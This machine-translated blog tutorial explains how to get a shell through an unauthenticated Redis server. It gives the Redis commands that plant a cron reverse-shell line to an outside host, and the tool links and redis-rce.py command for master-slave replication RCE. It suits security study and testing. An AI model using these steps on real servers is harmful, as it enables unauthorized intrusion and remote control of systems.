Shulou(Shulou.com)05/31 Report--

Xiaobian to share with you Redis+Getshell example analysis, I believe most people still do not know how, so share this article for everyone's reference, I hope you have a lot of harvest after reading this article, let's go to understand it together!

Foreword:

When we receive an authorized penetration test, scanning ports may reveal unexpected gains after unsuccessful attempts at conventional vulnerabilities such as injection, file upload, etc.

Knowing yourself and knowing your enemy is a hundred battles without danger. Redis introduces:

Simply put, redis is a Key-Value type database, redis all data in memory operations, and it can store the data in memory regularly in disk, and support the preservation of a variety of data structures (String, hash, list, etc.).

Redis vulnerability: 1. Unauthorized access vulnerability

By default, Redis will be bound to 0.0.0.0:6379. If IP access is not restricted, Redis services will be exposed to the public network, and in the absence of password authentication, any user will be unauthorized to access Redis and read Redis data and write public keys for remote connection.

When getting database permissions is not enough for us, our goal is only a getshell!

At present, there are two more mainstream methods, the first one is scheduled to rebound shell, and the second one is to use master-slave replication rce.

2, timing plan rebound shell

1）set x "\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n"

2）config set dir /var/spool/cron/

3）config set dbfilename root

4）save

3. Use master-slave replication rce

The vulnerability exists in versions 4.x and 5.x. Redis provides master-slave mode, which means that one redis is used as the master and the other as the backup machine. The data of the master slave machine is the same. The slave machine is only responsible for reading and the master is only responsible for writing. After Reids 4.x, it is possible to implement a new Redis command in redis to construct malicious.so files through external extensions. When two Redis instances are in master-slave mode, the master instance of Redis can synchronize files to the slave via FULLRESYNC. Then load the malicious so file on the slave to execute the command.

You need to use a tool, GitHub download.

1) git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand (make required)

2）git clone https://github.com/Ridter/redis-rce.git

Then connect to redis through unauthorized access or weak password, and execute the script to get the shell.

Victory thousands of miles away, actual combat drill:

6379, that is, Redis, is scanned this time. Sometimes it may be changed to the default port. It is recommended to scan all ports. This time, we use master-slave copy rce to obtain shell(since the vulnerability has been submitted to src and signed confidentiality agreement, we set up a drone to restore the real environment and ensure the original flavor.)

Attack IP: 192.168.109.134

Server IP: 192.168.109.136

Connect to redis via unauthorized access (try blasting if you have a password, authpassword login system): Redis-cli -h ip

Using master-slave copy rce to obtain shell

First, you need to generate a malicious.so file. Download RedisModules-ExecuteCommand and compile it with make.

Attackers execute:

python redis-rce.py-r target ip-p target port-L local ip -f malicious.so

Successfully acquired shell

The above is "Redis+Getshell sample analysis" all the content of this article, thank you for reading! I believe that everyone has a certain understanding, hope to share the content to help everyone, if you still want to learn more knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.